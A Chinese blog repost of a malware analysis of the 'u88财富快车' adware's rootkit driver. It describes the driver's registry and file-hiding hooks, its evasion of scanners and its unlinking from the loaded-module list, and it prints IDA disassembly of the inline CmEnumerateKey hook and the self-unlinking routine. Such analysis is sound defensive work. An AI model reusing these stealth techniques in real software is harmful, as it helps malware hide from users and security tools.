u88财富快车流氓软件RK驱动分析

来源：互联网发布：郭敬明整容知乎编辑：程序博客网时间：2024/04/30 00:20

BY mj0011

u88财富快车流氓软件RK驱动分析

RK部分一共三个文件
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
驱动部分是BOOT0的，主要干了这么些事:
1.建立CreateProcessNotifyRoutine,检测到userinit.exe加载后就修改注册Run项目，以启动VideoAti0.exe,VideoAtio0.exe启动后会删除自己的RUN项目，并注入VideoAti0.dll，导致启动后无法发现其启动项目

2.Hook CmEnumerateKey,隐藏VedioAti0.sys的服务项，Is，gmer,rku等无法检测到
通过CreatePrcoessNotifyRoutine检测到是如下进程调用CmEnumerateKey时，会恢复自己的HOOK，企图蒙混过关：D
fhs.exe,knlsc13.exe

3.Hook FSD Dispatch Routine,Hook了/FileSystem/Ntfs,和/FileSystem/FastFat的IRP_MJ_CREATE和IRP_MJ_DIRECTORY_FILE，根据默认规则库会首先过滤
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
无法列出他们
规则库还可以通过R3向R0添加

4.从PsLoadMoudleList移除了自身，使得IS,gmer等工具无法检测到它，gmer可检测到 FSD HOOK，也检测不到是哪个module作了HOOK

后来R3的规则好象很BT，系统登陆后加载任何位置的driver都会失败：D
分析后的idb文件见压缩包，和读源代码没什么区别了

摘点代码

.text:000112D4 NewCMEnumerateKey proc near             ; DATA XREF: ReadyHardCodeAndHook+1DBo
.text:000112D4                                         ; NewCMEnumerateKey+14Co
.text:000112D4
.text:000112D4 var_24          = byte ptr -24h
.text:000112D4 NewIrql         = byte ptr -1
.text:000112D4 arg_0           = dword ptr 8
.text:000112D4 arg_4           = dword ptr 0Ch
.text:000112D4 arg_8           = dword ptr 10h
.text:000112D4 arg_C           = dword ptr 14h
.text:000112D4 arg_10          = dword ptr 18h
.text:000112D4 arg_14          = dword ptr 1Ch
.text:000112D4
.text:000112D4                 push    ebp
.text:000112D5                 mov     ebp, esp
.text:000112D7                 sub     esp, 24h
.text:000112DA                 push    ebx
.text:000112DB                 push    esi
.text:000112DC                 push    edi
.text:000112DD                 call    ds:KeRaiseIrqlToDpcLevel
.text:000112E3                 mov     [ebp+NewIrql], al
.text:000112E6                 call    WP_OFF
.text:000112E6
.text:000112EB                 pushf
.text:000112EC                 pusha
.text:000112ED                 lea     esi, unk_14390
.text:000112F3                 mov     edi, CmEnumerateKeyAddress
.text:000112F9                 mov     ecx, 6
.text:000112FE                 cld
.text:000112FF                 rep movsb
.text:00011301                 popa
.text:00011302                 popf
.text:00011303                 call    WP_ON
.text:00011303
.text:00011308                 mov     cl, [ebp+NewIrql] ; NewIrql
.text:0001130B                 call    ds:KfLowerIrql
.text:00011311                 push    [ebp+arg_14]
.text:00011314                 mov     ebx, [ebp+arg_C]
.text:00011317                 mov     esi, [ebp+arg_4]
.text:0001131A                 push    [ebp+arg_10]
.text:0001131D                 add     esi, dword_14374
.text:00011323                 push    ebx
.text:00011324                 push    [ebp+arg_8]
.text:00011327                 push    esi
.text:00011328                 push    [ebp+arg_0]
.text:0001132B                 call    OldcmEnumerateKey
.text:00011331                 test    eax, eax
.text:00011333                 mov     [ebp+arg_4], eax
.text:00011336                 jge     short loc_11342
.text:00011336
.text:00011338                 cmp     eax, 8000001Ah
.text:0001133D                 jmp     loc_113FF
.text:0001133D
.text:00011342 ; ---------------------------------------------------------------------------
.text:00011342
.text:00011342 loc_11342:                              ; CODE XREF: NewCMEnumerateKey+62j
.text:00011342                 lea     eax, [ebp+var_24]
.text:00011345                 push    eax             ; char *
.text:00011346                 call    GetCurrentCallProcess
.text:00011346
.text:0001134B                 mov     edi, ds:_stricmp
.text:00011351                 lea     eax, [ebp+var_24]
.text:00011354                 push    offset s_Fhs_exe ; "fhs.exe"
.text:00011359                 push    eax             ; char *
.text:0001135A                 call    edi ; _stricmp
.text:0001135C                 pop     ecx
.text:0001135D                 test    eax, eax
.text:0001135F                 pop     ecx
.text:00011360                 jnz     short loc_1136D
.text:00011360
.text:00011362                 lea     eax, [ebp+var_24]
.text:00011365                 push    eax
.text:00011366                 push    offset s_ProcessnameS ; "ProcessName:%S/n"
.text:0001136B                 jmp     short loc_11387
.text:0001136B
.text:0001136D ; ---------------------------------------------------------------------------
.text:0001136D
.text:0001136D loc_1136D:                              ; CODE XREF: NewCMEnumerateKey+8Cj
.text:0001136D                 lea     eax, [ebp+var_24]
.text:00011370                 push    offset s_Knlsc13_exe ; "knlsc13.exe"
.text:00011375                 push    eax             ; char *
.text:00011376                 call    edi ; _stricmp
.text:00011378                 pop     ecx
.text:00011379                 test    eax, eax
.text:0001137B                 pop     ecx
.text:0001137C                 jnz     short loc_11390
.text:0001137C
.text:0001137E                 lea     eax, [ebp+var_24]
.text:00011381                 push    eax
.text:00011382                 push    offset s_Processname_0 ; "ProcessName:%S/n"
.text:00011382
.text:00011387
.text:00011387 loc_11387:                              ; CODE XREF: NewCMEnumerateKey+97j
.text:00011387                 call    DbgPrint
.text:00011387
.text:0001138C                 pop     ecx
.text:0001138D                 pop     ecx
.text:0001138E                 jmp     short StopHook
.text:0001138E
.text:00011390 ; ---------------------------------------------------------------------------
.text:00011390
.text:00011390 loc_11390:                              ; CODE XREF: NewCMEnumerateKey+A8j
.text:00011390                 mov     edi, dword_1439C
.text:00011390
.text:00011396
.text:00011396 loc_11396:                              ; CODE XREF: NewCMEnumerateKey+EFj
.text:00011396                 cmp     edi, offset HideReg
.text:0001139C                 jz      short StopHook
.text:0001139C
.text:0001139E                 test    edi, edi
.text:000113A0                 jz      short StopHook
.text:000113A0
.text:000113A2                 push    dword ptr [edi-8] ; wchar_t *
.text:000113A5                 call    ds:wcslen
.text:000113AB                 push    eax             ; size_t
.text:000113AC                 lea     eax, [ebx+10h]
.text:000113AF                 push    eax             ; wchar_t *
.text:000113B0                 push    dword ptr [edi-8] ; wchar_t *
.text:000113B3                 call    ds:_wcsnicmp
.text:000113B9                 add     esp, 10h
.text:000113BC                 test    eax, eax
.text:000113BE                 jz      short loc_113C5
.text:000113BE
.text:000113C0                 mov     edi, [edi+4]
.text:000113C3                 jmp     short loc_11396
.text:000113C3
.text:000113C5 ; ---------------------------------------------------------------------------
.text:000113C5
.text:000113C5 loc_113C5:                              ; CODE XREF: NewCMEnumerateKey+EAj
.text:000113C5                 push    dword ptr [edi-8]
.text:000113C8                 push    offset s_FoundHideregS ; "Found HideReg:%S/n"
.text:000113CD                 call    DbgPrint
.text:000113CD
.text:000113D2                 pop     ecx
.text:000113D3                 inc     esi
.text:000113D4                 pop     ecx
.text:000113D5                 mov     dword_14374, 1
.text:000113DF                 push    [ebp+arg_14]
.text:000113E2                 push    [ebp+arg_10]
.text:000113E5                 push    ebx
.text:000113E6                 push    [ebp+arg_8]
.text:000113E9                 push    esi
.text:000113EA                 push    [ebp+arg_0]
.text:000113ED                 call    OldcmEnumerateKey
.text:000113F3                 test    eax, eax
.text:000113F5                 mov     [ebp+arg_4], eax
.text:000113F8                 jge     short StopHook
.text:000113F8
.text:000113FA                 cmp     eax, 8000001Ah
.text:000113FA
.text:000113FF
.text:000113FF loc_113FF:                              ; CODE XREF: NewCMEnumerateKey+69j
.text:000113FF                 jnz     short StopHook
.text:000113FF
.text:00011401                 and     dword_14374, 0
.text:00011401
.text:00011408
.text:00011408 StopHook:                               ; CODE XREF: NewCMEnumerateKey+BAj
.text:00011408                                         ; NewCMEnumerateKey+C8j
.text:00011408                                         ; NewCMEnumerateKey+CCj
.text:00011408                                         ; NewCMEnumerateKey+124j
.text:00011408                                         ; NewCMEnumerateKey:loc_113FFj
.text:00011408                 call    ds:KeRaiseIrqlToDpcLevel
.text:0001140E                 mov     [ebp+NewIrql], al
.text:00011411                 call    WP_OFF
.text:00011411
.text:00011416                 pusha
.text:00011417                 mov     edi, CmEnumerateKeyAddress
.text:0001141D                 mov     al, 68h
.text:0001141F                 stosb
.text:00011420                 lea     eax, NewCMEnumerateKey
.text:00011426                 stosd
.text:00011427                 mov     al, 0C3h
.text:00011429                 stosb
.text:0001142A                 popa
.text:0001142B                 call    WP_ON
.text:0001142B
.text:00011430                 mov     cl, [ebp+NewIrql] ; NewIrql
.text:00011433                 call    ds:KfLowerIrql
.text:00011439                 mov     eax, [ebp+arg_4]
.text:0001143C                 pop     edi
.text:0001143D                 pop     esi
.text:0001143E                 pop     ebx
.text:0001143F                 leave
.text:00011440                 retn    18h
.text:00011440
.text:00011440 NewCMEnumerateKey endp

.text:00011794 RemoveMyselfFormPsLoadModuleLIst proc near ; CODE XREF: start:loc_1049Fp
.text:00011794
.text:00011794 var_208         = word ptr -208h
.text:00011794
.text:00011794                 push    ebp
.text:00011795                 mov     ebp, esp
.text:00011797                 sub     esp, 208h
.text:0001179D                 and     [ebp+var_208], 0
.text:000117A5                 push    esi
.text:000117A6                 push    edi
.text:000117A7                 mov     ecx, 81h
.text:000117AC                 xor     eax, eax
.text:000117AE                 lea     edi, [ebp-206h]
.text:000117B4                 rep stosd
.text:000117B6                 stosw
.text:000117B8                 mov     eax, PsLoadedModuleList
.text:000117BD                 mov     edi, [eax]
.text:000117BF                 mov     esi, edi
.text:000117BF
.text:000117C1
.text:000117C1 loc_117C1:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+88j
.text:000117C1                 cmp     dword ptr [esi+20h], 0
.text:000117C5                 jz      short loc_11816
.text:000117C5
.text:000117C7                 push    dword ptr [esi+28h] ; VirtualAddress
.text:000117CA                 call    ds:MmIsAddressValid
.text:000117D0                 test    al, al
.text:000117D2                 jz      short loc_11816
.text:000117D2
.text:000117D4                 mov     eax, [esi+28h]
.text:000117D7                 test    eax, eax
.text:000117D9                 jz      short loc_11816
.text:000117D9
.text:000117DB                 movzx   ecx, word ptr [esi+24h]
.text:000117DF                 shr     ecx, 1
.text:000117E1                 push    ecx             ; size_t
.text:000117E2                 push    eax             ; wchar_t *
.text:000117E3                 lea     eax, [ebp+var_208]
.text:000117E9                 push    eax             ; wchar_t *
.text:000117EA                 call    ds:wcsncpy
.text:000117F0                 lea     eax, [ebp+var_208]
.text:000117F6                 push    eax             ; wchar_t *
.text:000117F7                 call    ds:_wcslwr
.text:000117FD                 lea     eax, [ebp+var_208]
.text:00011803                 push    offset s_Videoati0 ; "videoati0"
.text:00011808                 push    eax             ; wchar_t *
.text:00011809                 call    ds:wcsstr
.text:0001180F                 add     esp, 18h
.text:00011812                 test    eax, eax
.text:00011814                 jnz     short loc_1181E
.text:00011814
.text:00011816
.text:00011816 loc_11816:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+31j
.text:00011816                                         ; RemoveMyselfFormPsLoadModuleLIst+3Ej
.text:00011816                                         ; RemoveMyselfFormPsLoadModuleLIst+45j
.text:00011816                 mov     esi, [esi]
.text:00011818                 cmp     esi, edi
.text:0001181A                 jz      short loc_11828
.text:0001181A
.text:0001181C                 jmp     short loc_117C1
.text:0001181C
.text:0001181E ; ---------------------------------------------------------------------------
.text:0001181E
.text:0001181E loc_1181E:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+80j
.text:0001181E                 mov     eax, [esi]
.text:00011820                 mov     esi, [esi+4]
.text:00011823                 mov     [eax+4], esi
.text:00011826                 mov     [esi], eax
.text:00011826
.text:00011828
.text:00011828 loc_11828:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+86j
.text:00011828                 pop     edi
.text:00011829                 pop     esi
.text:0001182A                 leave
.text:0001182B                 retn
.text:0001182B
.text:0001182B RemoveMyselfFormPsLoadModuleLIst endp